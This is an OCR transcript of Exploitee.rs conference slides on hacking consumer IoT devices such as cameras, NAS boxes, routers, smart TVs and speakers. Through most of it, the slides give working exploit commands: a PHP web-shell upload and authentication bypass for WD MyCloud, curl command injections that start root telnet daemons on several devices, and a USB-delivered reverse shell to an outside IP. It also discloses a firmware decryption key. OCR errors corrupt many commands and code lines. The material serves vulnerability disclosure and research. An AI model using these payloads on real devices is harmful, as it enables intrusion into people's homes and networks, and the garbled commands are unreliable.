
e© 






About Us 


• @Zenofex - Founder of Exploitee.rs, Senior Research Scientist at Cylance, 
Founder of Pastecry.pt 

• @cj_000 - Works at Draper, does hardware/software exploitation things... 

• @0x00string- Hacker, Recreational Bug User, Senior Research Engineer 

• @maximus64_- An recent graduate of the University of Central Florida 
who is a master of the soldering iron. 

Note: This presentation and thoughts are ours, and ours alone, and have no relationship to our employers 
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Other Members 


• [mbm] (@mbmwashere) - Co-founder of OpenWRT 

• Gynophage (@gyno_lbs) - DEF CON CTF organizer 

• @nOnstlck - "Boring" corp-sec dude 

• Saurik (@saurik) - Creator of Cydia 

• Tdweng (@tdweng) - Master software developer 

• Cody Walker- "Web platform is best platform" 

• Ian - "Praises our all mighty internet overlords" 
















About Exploitee.rs 

• The artists formerly known as GTVHacker 

• Presented at a bunch of stuff (Blackhat, DEF CON, BSides) 

• Released root methods for multiple generations of Google TV devices 
and other embedded systems 

• Televisions, Blu-Ray Players, Refrigerators, and more 

• Pushed for DMCA exemptions in jailbreaking smart devices 

• Maintains network of sites documenting vulnerabilities 

• Community and Group driven 
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Types of Vulnerabilities / Exploits 


• UART (Universal Asynchronous Receive Transmit) - Debug interface that is usually present 

• Debug interface that is usually present 

• Like a serial port. May gain full access from this alone 

• JTAG (Joint Test Action Group) - 

• Debug interface that allows full CPU access 

• Often hard to find, closed, and can use unknown instructions 

• Pull and Program- 

• Remove the flash and reprogram - Difficult, but often not protected 

• LFD - Local File Disclosure, extracting information from a device 

• Information disclosure 

• RCE - Remote Code Execution 

• Payload execution without physical access 
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Plan of Attack 


Get The Firmware Or Die Trying 

• UART, JTAG, Debug Headers 

• Sometimes the firmware update url is printed to 
UART / Debug Logs 

• Mobile/Desktop App RE 

• MiTM Network Traffic 

• Dump Flash 

Find More Bugs 
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Tenvis T8810 

• IP Cam 

• Pan, Tilt, Zoom 

• Wireless 

• Two Way Audio 


TENVis 

^ _ ^ 
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Tenvis T8810 UART Shell 




• UART 

• Linux needs username and password 

• Obvious ones didn't work 

• U-boot 

• 3 second timeout - press any key 

• setenv bootargs 
console=${consoledev},${baudrate} 
noinitrd mem=${mem} rw ${rootfstype} 
init=/bin/sh ;sf probe 0 Ojsf read 
${loadaddr} ${sfkernel} ${filesize}; bootm 
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Tenvis T8810 Post-Auth Brick 


• Post-Auth Semi-Permanent Brick (admin/admin) 

• curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: 
Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form- 
urlencoded' -H 'Connection: keep-alive' --data 

'cmd=setwirelessattr&cururl=http%3A%2F%2Fl92.168.1.88%2Fwifi.html&- 
wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef &-wf_enc=0 &- 
wf_enable=l&-wf_key=keyl2345' --compressed 

• OxOD = Carriage Return 

• OxOA = New Line 

• Causes the main app to segfault, possible corruption bug 

• Recovery possible via UART 
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Samsung SDR-3102N Security DVR 


• 4 channel Security DVR 






Samsung SDR-3102N Security DVR UART 


• UART Located on board 

• Interrupt U-Boot Shell 

• Add to bootargs 

• init=/bin/sh 

• console=ttyAMAO, 115200 

• Boots to kernel 

• Exploring the file system... 
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Samsung SDR-3102N Security DVR USB Root 


• Script detects a FAT USB Drive 

• Executes "diag_1673" if it exists 

• Create a file named "diag_1673" 

#!/bin/sh 

/bin/busybox telnetd -1 /bin/sh 

• Root! 


DIAG 

BIN=diag 

1673 

USB-' 

fdisk -l 

| grep FAT | cut -d 1 ' -f 0 | grep -e 

if [ 

"$USB" ! = 

= ]; then 


mount 

$USB /home/factory 


if I 

•f /home/factory/$DIAG_BIN ]; then 



/root/utils/diswdt 



chmod +x /home/factory/$DIAG BIN 
/home/factory/$DIAG_BIN & 


else 

umount /home/factory 
dvr_run 


fi 


else 




dvr run 

fi 


_ 
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Samsung SDR-3102N Security DVR Facepalm 


• Quick search of "diag_1673" finds a PDF 































Samsung SL-M3320ND Printer 


Samsung 600 MHz Cortex 
A5 with 128 MB DDR SODIMM 







Samsung SL-M3320ND Printer NAND Backup 

• NAND Backup, in the event something goes wrong 











Samsung SL-M3320ND Printer Modifications 

• Not Signed, modify the toner level to always read 100% 
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SL-M3320ND 



Black Toner Cartridge 



Status: 
Remaining: 
Impression: 
Capacity g: 
Model ID: 
Serial Number: 


100 % 


1972 Impressions 
5.0 K 

MLT-D203S 

CRUM- 

13080257215 
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Chromecast (Gen 1) 


Original Chromecast 

• We've rooted this device the first time 

• Helped with the second time too! 
Marvell 88DE3005 (DE3005-A1) 



3U, 


1 _ 
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Chromecast (Gen 1) NAND Flash 


Initial release had vulnerable bootloader which 
allowed booting of an unsigned image 

• Patched in FW ver. 12840 

failOverflow released an additional bootloader 
exploit 

• Also patched! 

Downgrade to vulnerable version with a NAND 
flash programmer using a STM32F4Discovery 

Secure boot is also enabled 
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Chromecast (Gen 1) NAND Downgrade 

• Wire the NAND flash to the STM32F4Discovery board 

• Calculate ECC for the bootloader image 

• Erase and write in the new bootloader 

• Now you can use the original exploit to root your Chromecast 







Zmodo ZH-CJAED Smart Doorbell 


• Wi-Fi Connected Doorbell 

• Streaming Video 

• Two-way audio 

• Motion Detection 

• Purchased at Las Vegas Fry's 
two days ago 

• Because, what else would 
anyone do in Las Vegas? 


* 
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Zmodo ZH-CJAED Hardware Root 


\ 


1. Connect to UART on the 
back of the board 



2. When it boots it drops to a 
root shell 

3. There is no step three 
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Zmodo ZH-CJAED Potential Software Root 



0000919c 

Idr 

r0, [rll, #-0x24] {Query String} 

000091a0 

mov 

rl, r3 {Decoded Query} 

// Happily decodes 

any size buffer into this fixed size buffer 

000091a4 

bl 

decode 
















WD MyCloud 



• Network Attached Storage Device 


Hacked KT 

• Multiple models 


The Exploi+eers 

1 

• MyCloud 


• 

• My Cloud Gen 2 



• My Cloud Mirror 


mmm i 1 

• My Cloud PR2100/PR4100 


1 

• My Cloud EX2 Ultra/EX2/EX4 



• My Cloud EX2100/EX4100 


• • 

• My Cloud DL2100/DL4100 


• • t • 

• Already hacked by us once 
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WD MyCloud Arbitrary File Upload 


/var/www/web/jquery/uploader/multi_uploadify.php 

28 $ip = gethostbyaddr($_SERVER[ , HTTP_HOST']); 

29 $name = $_REQUEST [ 1 name' ] ; 

30 $pwd = $ REQUEST t 1 pwd 1 ] ; 

31 $redirect_uri = $_REQUEST [ 1 redirect_uri' ] ; 

32 

33 //echo $name ."<br>".$pwd."<br>".$ip; 

34 

35 

36 $result = @stripslashes( @ oin( @file( "http://" .$ip. "/mydlink/mydlink.cgi?cmd=l&name=" . $name. "=&pwd=" . $pwd ),"" )); 

37 

38 $result_l = strstr($result , "<auth_status>0</auth_status>" ) ; 

39 $result_l = substr ($result_l, 0,28); 

40 

41 if (strncmp ($result ,"<auth_status>0</auth_status>",28) == 0 ) 

42 //if (strstr($result,"<auth_status>0</auth_status>")== 0 ) 

43 { 

44 header("HTTP/l. 1 302 Found"); 

45 headerC'Location: " . $redirect_uri. "?status=0" ) ; 

46 exitO; 

47 } 

Auth based on string returned from a request to a file that does not exist. 
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WD MyCloud Arbitrary File Upload 

/var/www/web/jquery/uploader/multi_uploadify.php 

50 if ( !empty($_FILES)) { 

51 

52 $targetPath = $_REQUEST[ 'folder' ] . 

53 $count = (count($_FILES["Filedata"] )-2) ; 

54 

55 

56 for ( $1=0; $1 < $count; $I++ ) 

57 { 

58 $tempFile = $_FILES [' Filedata 1 ][' tmp_name 1 ] [$I] ; 

59 

60 if ($tempFile == "") 

61 { 

62 continue; 

63 > 

64 $new_file_name = str_replace( ' \\ 1 , 11 , $_FILES [ 'Filedata '][ 1 name '] [$I] ) ; //amy++ 

65 $targetFile = str_replace(,$targetPath) . $new_file_name; 

66 

67 $status = move_uploaded_file($tempFile,$targetFile) ; 

File upload to an arbitrary location through a multipart form upload. 

POC: 

printf "<?php echo system(\$_GET['cmd 1 ]); ?>" > /tmp/phpshell.php 
curl -v " http://<IP>/web/iquery/uploader/multi uploadifv.php?folder=/var/www/ " -F " Filedata[1=@/tmp/phpshell.php " 
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WD MyCloud Arbitrary File Upload POC 










WD MyCloud Authentication Bypass 


Usage: wto [parm] 


help 

user name 
ip address 
set timeout 
get timer 
check timeout 
reset timer 
remove all 
del timeout item 
show all 
del user 


WD MyCloud uses the following to determine if a user 
is logged in: 

• User's IP 

• Session timeout 

• 1 "isAdmin" cookie 

• 1 "username" cookie 

PHP scripts use exec calls to the wto binary to create a 
time based local "session" for the user. 

CGI binaries also use wto to update local "session" info 
for the user 
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WD MyCloud Authentication Bypass 


Network_mgr.cgi performs the following: 

• Checks if "cmd" GET variable is "cgi_get_ipv6" 

• Checks if "flag" GET variable is "1" 

• Resets the "wto" timeout and ip for the admin user 

• Checks if admin is logged in 






WD MyCloud Authentication Bypass + Root 


PeyWPTI*/ f) 

DfUti««*7 


WD did not fix previously released post- 
auth RCE vulns. 

Any post auth from our wiki can be used. 
70 RCE's to choose from 
• Now all pre-auth 


POC: 

curl -v " httpy/igZ.lSS.SS.lO^cgi-bin/network mgr.cgi?cmd=cgi get ipv6&flag=l " 
curl -i " http://192.168.86.104/web/dsdk/DsdkProxy.php 11 --data "^id;"' --cookie "isAdmin=l;username=admin" 
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Vudu Spark 


"Vudu" Media Streaming Stick 
Only available from Walmart 
Provides VUDU streaming service 














Amazon Tap 


• Portable WiFi + Bluetooth Speaker 
• With Alexa 









Amazon Tap Teardown 


\ 


• Freescale MX6 

• Secure Boot implemented in U-Boot 



• Boots from eMMC Flash 

• So much glue 

• Full Teardown, expose the board 
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Amazon Tap UART 


\ 


• UART 

• U-Boot-Output, no shell 

• Kernel - Also no shell 


• TM30/TM26 - TX/RX 

• But how can we execute code? 

• Ground the Flash! 
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Amazon Tap Flash Grounding 



• Lower Resistor next to TP27 

• Ground during boot 

• Drops to U-Boot Shell 

• Defeats the timeout 

• Can't read environment variables 

• Write to memory and execute 















QNAP NAS TS-131 
















QNAP NAS TS-131 Transcoding Service 

$ lsof-1 

mytransco 8645 admin 6u IPv4 26431 OtO TCP *:9251 (LISTEN) 

$ netstat -aen 

tcp 0 0 0.0.0.0:9251 0.0.0.0:* LISTEN 

$ ps aux 

8645 admin 3816 S /usr/local/medialibrary/bin/mytranscodesvr -s -u -debug - 
db /share/CACHEDEVl JDATA 
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QNAP NAS TS-131 Filtering 

rmfile" case statement 


case 1: 

D_INFO("handling rmfile\n") ; 

D_INFO( ,, filenane = %s\n", (char *)fcrecg_buff + 4); 
memcpy (&dest , ferecubuf f , 0x2450uLL); 

D_INFO("remoue File: %s From transcoding database.\n" , 6u164); 
u8O = renoueFileFroinDatabase(&u164, &g_newDB); 
goto LABEL_6; 


Call to system() and StringConvert2SystemCmdFilename 

sprintf(u1, "%s%sAs.transcoding", u3, ,, .@_thunb/transcode ,, > u3 + 128); 
if ( renoue(ul) ) 

fprintf(stderr, "[%s:%d] reonue %s fail\n", "MyTranscodeSur.c", 697LL, Ml); 
strcpy(u1, src); 

if ( (unsigned int)StringConuert2SystenCndFilenanie(( _int64)u1, ( _int64)src) ) 

puts( M StringCongert2SystemCn)dFilename() failed."); 
sprintf(u2, "^snynediadbcnd TranscodeStatus %s 0", gpWorkingPath, Ml); 
return system(u2); 


Transcoding service 

• Listens on TCP port 9251 

• Service runs as root 

• Accepts commands to transcode files 

• Command "rmfile" is vulnerable to a 
command injection 

• Sanitization routine filters most unsafe 
characters 

• Except vertical pipe! 

• Spaces are filtered 

• Use tabs between arguments 

• Filters: 0x20 I $ & 0x39 ,; = [ ] A ' {} % 

• Doesn't filter | or\ 

e© 






QNAP NAS TS-131 








Belkin N300 WiFi Range Extender 


• WiFi Range Extender 



• Plugs in, extends WiFi 

1 


• Hardware root 

. 

• •• • 

• t 


• UART interface will drop to a 

• • 


root shell after the device 

belkin 


completes booting 


w 
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Belkin N300 WiFi Range Extender 

• Remote Root 

• setting_hidden.asp 

• Multiple form parameters are passed to a shell without sanitization 

• Possible to inject an OS command 

• Runs as root 







Belkin N300 WiFi Range Extender Exploit 


• Limited set of commands on the box via busybox 

• Wget, ping 

• No netcat, telnet, telnetd, etc 

• Command executes as root 

• curl -i -s -k -X 'POST' -H 'Referer: http://I92.168.206.1/setting hidden. asp ' -H 
'Content-Type: application/x-www-form-urlencoded' --data-binary 

$'location_page=setting_hidden.asp&arc_action=vl_wizard_sel_ap&wl_ssid=">/dev/null 
;wget 10.0.0.1; echo 

"AAAA&wl ssidforfile=BBBB&wl_seckey=CCCC&wl_seckeyforfile=DDDD&action=SetPassWord& 
f o rmHiddenSSID=fo rmHiddenSSIDpage&s ubmit-url- 

ok=setting_checkpassword.asp&hidden_sectype=02 0 &wl_rssi=ZXZX&wl_ssid_field=EEEE&ke 
y=FFFF&sec=wpa2a&bHiddenAP=l' 'http://192.168.206.1/goform/formBSSetSitesurvey ' 
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Netgear WN3000RP WiFi Extender 


The Netgear WN3000RP 

WiFi range extender 

Runs OpenWRT KAMIKAZE on 
MIPS32. 

"Move around with your mobile 
devices and keep them connected 
by giving your existing WiFi 
coverage a boost." 
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Netgear WN3000RP WiFi Extender HW Root 


• The UART interface is located on 
the top right of the board, and 
runs at 57600, 8nl 

• After booting, a root shell is 
executed on the UART TTY. 

• A telnet daemon can be launched 
by executing '/usr/sbin/telnetd&' 
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Netgear WN3000RP Wifi Extender Login 


|_| WIRELESS FREEDOM 

KAMIKAZE (bleeding edge, rl8571) - 

* 10 oz Vodka Shake well with ice and strain 

* 10 oz Triple sec mixture into 10 shot glasses. 

* 10 oz lime juice Salute! 


root@WN3000RPv3:/# id 
uid=0(root) gid=0(root) 
















Linksys WRT1200AC 


• Linksys WRT1200AC 

• Two external antennas, 1.3GHz 
dual-core ARM, Wireless-AC 

• Firmware Version: 1.0.5.177401 
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Linksys WRT1200AC 

• Post auth exploit: 

• Post authentication root via arbitrary file access due to improper 
sanitization of path field in media sharing setup. Sanitization takes 
place on client side, not enforced server side. 

• The following curl command is a Proof of Concept which 
demonstrates creating a file share at /. 







Linksys WRT1200AC Exploit 


• curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (Xll; Linux i686; rv:45.0) 
Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/json; charset=UTF-8' -H 
'X-JNAP-Action: http://linksys.com/j nap/storage/CreateFTPFolder ' -H 'Expires: Fri, 
10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' -H 'X- 
Requested-With: XMLHttpRequest' -H 

'Referer: http://I92.168.1.1/ui/1.0.99.177401/dynamic/home.html ' -b 'initial-tab=; 
visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter- 
values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2Cwi 
relessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 
CREDS>; current-applet=A2DBl6C0-5 9B9-4C7 9-9BF2-E5A3A307F9C1' --data-binary 
$'{\"name\":\"HAXHAXHAX\", \"partitionName\":\"/dev/sdal\" , \"path\":\"/../../../../ 
../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' 

' http://192.168.1.1/JNAP/ ' 
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LG BPM350 










LG BPM350 Pandora Application 

• LG BP350 includes the Pandora Internet Radio App which 

• Launcher script for Pandora checks against USB mapped paths for scripts 
before checking for local copy 

• Create a script named PandoraApp 

• Placing it in the root of a flash drive 

• Plug it into the set top box, launch Pandora 

• Executes the script - with root privileges. 
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LG BPM350 Exploit 


• The following command will add a file to a flash drive, spawn a 
reverse TCP shell when run on the player, and execute 
the Pandora app normally. 


• printf "/bin/bash -i >& /dev/tcp/192.168.100.126/4444 0>&1; 
/usr/local/bin/pandora/PandoraApp -qws -display directfb;" > 
/path/to/flashdrive/root/PandoraApp 
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D-Link DCS-936L 



• The DCS-936L HD Wi-Fi Camera 
Wide angle lens 
Super HD 720p Quality. 

The built-in night vision, motion 






D-Link DCS-936L Decryption Routine 


• Encrypted Firmware - how is it decrypted? 

• With Openssl, of course 

mov rO, r3 ; argument #1 for method sprintf@PLT 

Idr rl, = 0x94f88 ; 0x40128,"openssl enc -d -aes-128-cbc -k \\\"%s\\\ " -nosalt -in db.xml.export.aes -out 

db.xml.export >/dev/null 2>/dev/null", argument #2 for method sprintf@PLT 


Idr 

r2, [fp, #-0x1 c] 

bl 

sprintf@PLT 

sub 

r3, fp, #0x3f0 

mov 

rO, r3 

bl 

system@PLT 







D-Link DCS-936L Firmware Decryption 

• Firmware Update Decryption: 

• openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in 
update.aes -out "update" 11 exit 

• openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in 
update.bin.aes-out "update.bin" || exit 

• Yes, the key is "s7.303%_4&%&oj9e" (no quotes) 
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D-Link DCS-936L Command Injection 


• Post authentication root via arbitrary command injection due to 
improper sanitization of the SSID field in the wifi configuration form. 

• curl -i -s -k -v -X 'POST' -H 'Host: 10.255.255.1' -H Referer: 

http://10.255.255.l/eng/admin/adv_wireless.cgi -H ’Cookie: language=eng; 
usePath=null' -H 'Authorization: Basic <CREDS>' --data 
'wireless=l&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20- 
1%20/bin/sh 

%2 6;SSID=&mode=0 &optSecurity=0 &optEncryption=TKIP&key=&extAntenna=0 Schanne 
1=6' 'http://10.255.255.1/eng/admin/adv_wireless.cgi' 






Lutron L-BDG2-WH Caseta Smart Bridge 

• Home Automation Smart Bridge 

• Controls up to 50 devices 

• Lights, Thermostats, Dimmers etc 
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Lutron L-BDG2-WH Caseta Smart Bridge UART 

• Features an unlabeled UART 
interface 



• Drops to a root shell... 

. \ ' : *• ' 1 


• Digging around the filesystem 
and app, private ssh keys for 
communication with box and 
external server 


eQ 
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Vizio P602UI TV 


• 4K Smart TV 

• HDCP 2.2, Full Array Backlit LED 

• Sigma SOC 

• Utilizes Sigma SDK 

• Yahoo Smart TV 

• Nobody uses this anymore 

• Why was this even a thing? 
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Vizio P602UI TV eMMC Reading 



• First attempt - Read the eMMC 

• Buy a board on ebay 

• Power board 

• Dump eMMC 

• See our Blackhat 2017 talk! 

• From here, examine the filesystem 

• Also added persistent code to start 
telnet, rooted via hardware 



























Vizio P602UI TV User Manual 

• TV has a HTML User Manual, opened via the "hidden" Opera Browser 

• User Manual has an update procedure 

• User Manual downloads a tar file, uses gpg for signing 

• No good vector 

• But how does it download? 

<script> 

sigma.execfwget https:// ...."); 

</script> 
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Vizio P602UI TV Custom Apps 

• Code can be executed through the hidden web browser 

• Shared Library has a whitelist of allowed domains 

• Earlier included amazon.com, netflix.com, localhost, and more 

• Current version is considerably more limited 

• Let's try something local, but how? 

• With a custom "app" 

• Web interface to upload apps to Yahoo servers, then download them to TV 
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Vizio P602UI TV Exploit 


• App can open a webpage on the local filesystem eGploitee.rs 

• Not documented, but works 

URL=file://rw_data/yahoo/data/Widgets/Installed/5.com.exploiteers.1.widget/Contents/vizio.html 

• Custom HTML page contains 

<script> 

var sigma = new SigmaBridge(); 

sigma.exec("/bin/busybox telnetd -1/bin/sh -pl337"); 

</script> 

• Launch the app... Root shell on port 1337! 
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IK* 

AOBO Hidden Spy Camera 720P 

• So I'm totally James Bond 

• Really looks like me too, right? 

• I want to spy on someone 

• Clearly the $20 AOBO Spy Camera 
is the way to go! 
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AOBO Hidden Spy Camera 720P 


• Turn it on, creates a WiFi AP 

• No target would ever find this 

• WiFi AP doesn't need a 
password 

• Ok... 

• nmap 


Nmap scan report for 192.168.0.1 

Host is up (0.019s latency). 

Not shown: 997 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

23/tcp open telnet 

6789/tcp open ibm-db2-admin 

MAC Address: 02:E0:4C:60:3B:OB 
(Unknown) 
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AOBO Hidden Spy Camera 720P 


• Telnet and FTP 

• Well, maybe there is at least a 
username and password? 

• Username - Yes 

• Password - No 



$: telnet 192.168.0.1 
Trying 192.168.0.1... 

Connected to 192.168.0.1. 

Escape character is ' A ] ' . 

anyka login: root 
welcome to file system 
[root@anyka ~]$ 
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AOBO Hidden Spy Camera 720P 






CUJO Smart Internet Security 
Firewall 









Cujo — All the Glue 

















Cujo UART + U-Boot 


\ 



Exploitee.rs 


• UART under the glued pads. 

• Drop to a U-Boot shell by 
grounding the eMMC data line at 
the right spot 

• After stage 1, while stage 2 is 
booting, hold for 3-4 seconds to 
ground 













VeraEdge-US Smart Home Controller 


Vera Home Controller Hub 

Home Automation 

"Adjust Lights, Lock Doors, Set 
Thermostats and More for 
Convenience and Security. 
Control Up To 220 Devices with 
Reliable Wireless Technology." 
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VeraEdge-US Smart Home Controller LFD 


• Local File Disclosure via store_file.sh and get_file.sh, both which can be hit without 
authentication 

• From here, store_file and get_file can be leveraged to extract data 

• get_file requires a directory to exist, which store_file conveniently creates 

• curl -X POST -v l http://192.168.1.130/cgi-bin/cmh/store file.sh 1 --data store_file=123 

• curl -X POST -v l http://192.168.1.130/cgi-bin/cmh/get file.sh 1 --data filename="../../../../../etc/cmh/cmh.conf" 

• Plus SSH key files for connecting back to the Vera Servers, and support users to scp files encrypted with a 
static key (also in the box!) 









VeraEdge-US Smart Home Controller Root 


• M get_file.sh" can return any file 
on the system utilizing 
directory traversal 







GGMM E3 Smart Speaker 


Smart Speaker 

Uses WiFi for Internet Radio 

• Pandora 

• Spotify 

• IHeartRadio 

• Etc.. 

Features an Android App 




O 
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GGMM E3 Smart Speaker 

• "Reversed" the Android App 

• Found update procedure 

• Obtained and extracted firmware 

• Identified potential vulnerability in "rootApp" 

• iwpriv raO set Keyl=%s 

• This can be accessed pre-authenticated via "httpapi.asp" 







GGMM E3 Smart Speaker RCE 


• curl ' http://192.168.43.37/httpapi.asp 1 -H 'CONTENT-TYPE: 

application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache- 
Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified- 
Since: 0, O' --data 

'command=wlanConnectApEx:ssid=63 6A32:ch=l:auth=WPA2PSK:encry=AES:p 
wd=3132333435363738; /usr/sbin/telnetd; :chext=0' --compressed 


• Via new Telnet daemon, root - preauth remote command execution as root 







MUZO Cobblestone Wi-Fi Audio Receiver 

• Smart Audio Streamer 

• Uses WiFi for Audio Streaming 

• "Stream Music From Phone, 

Airplay, NAS, Multi-room. Make 
Your Speakers Wireless" 






MUZO Cobblestone Wi-Fi Audio Receiver 

• Thursday Fry's Run (When we also got the Doorbell) 

• Hooray for the Las Vegas Fry's! 

• Low quality electronics at high quality prices 

• Needed to confirm a hypothesis... 

• Oddly enough, nmap had an open Telnet server 

• admin/admin for root access - but ignore that for now 






MUZO Cobblestone Wi-Fi Audio Receiver 


• curl ' http://192.168.43.37/httpapi.asp 1 -H 'CONTENT-TYPE: 

application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache- 
Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified- 
Since: 0, O' --data 

'command=wlanConnectApEx:ssid=63 6A32:ch=l:auth=WPA2PSK:encry=AES:p 
wd=3132333435363738; /usr/sbin/telnetd; :chext=0' --compressed 


• Telnet, and root - preauth command injection 

(yes, it's the same slide) 
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MUZO Cobblestone Wi-Fi Audio Receiver 


• It's the same bug... different "manufacturer" 

• Looks like most of these use a "Turn Key WiFi Solution" called LinkPlay 

• Remember that app reversing? 

• http://fwupdate.wiimu.com:8020/wifi audio image v2/products.xml 

• Also all http and unsigned, lots of easy MITM for root... but ignore that 

• 96 unique models 

• 7 hardware revisions 

• At a glance, many appear to also be affected by this RCE 

• 35 products listed on the "LinkPlay/WiiMu" page alone 
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LinkPlay Devices 



^ Hi 













Demo 
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Thank You 







Questions 
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